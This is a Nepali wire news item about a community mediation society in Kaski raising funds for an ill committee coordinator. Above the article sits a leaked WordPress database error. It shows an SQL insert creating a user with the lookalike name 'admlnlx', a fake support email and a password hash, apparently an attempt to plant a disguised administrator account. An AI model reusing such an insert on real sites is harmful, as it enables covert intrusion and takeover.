WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BezpASjOXcmbUScXzZkNJN7uqf4M5N0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 16:03:04', '', 'admlnlx', 'admlnlx')
पोखरा, पुस ५ –
सामुदायिक मेलमिलापकर्ता समाज कास्कीको सक्रियतामा बिरामी भएर उपचार गराइरहेकासामुदायिक मेलमिलाप समिति हेमजाका संयोजक लालबहादुर गायकलाई रु ६७ हजार ५०० सहयोग गरिएको छ ।
समुदायमा मेलमिलाप कार्यमा सक्रिय रहँदै आउनुभएका ५४ वर्षीय गायक मुटु लगायत स्वास्थ्य समस्याका कारण काठमाडौँस्थित ग्रान्डी अस्पतालमा उपचार गराइरहनुभएको छ ।
सामुदायिक मेलमिलापकर्ता समाज कास्कीका संयोजक प्रतिभा अधिकारीले गायकलाई समाजका तर्फबाट रु २० हजार र अन्य सहयोग जिल्लास्थित सिद्ध, ढिकुरपोखरी, पोखरा उपमहानगरपालिका, सार्दी खोला, लेखनाथ, कृस्ती, रुपाकोट र भरतपोखरीका सामुदायिक मेलमिलाप समिति मार्फत उपलब्ध गराइएको हो ।
कास्की जिल्लामा २०६० सालदेखि सामुदायिक मेलमिलाप सेवा सञ्चालन हुँदै आएको छ । समुदायस्तरका विवाद प्रहरी चौकी एवम् अदालतसम्म नपु¥याउने उद्देश्यका साथ समाज एवम् स्थानीय समिति क्रियाशील बनेको छ । – रासस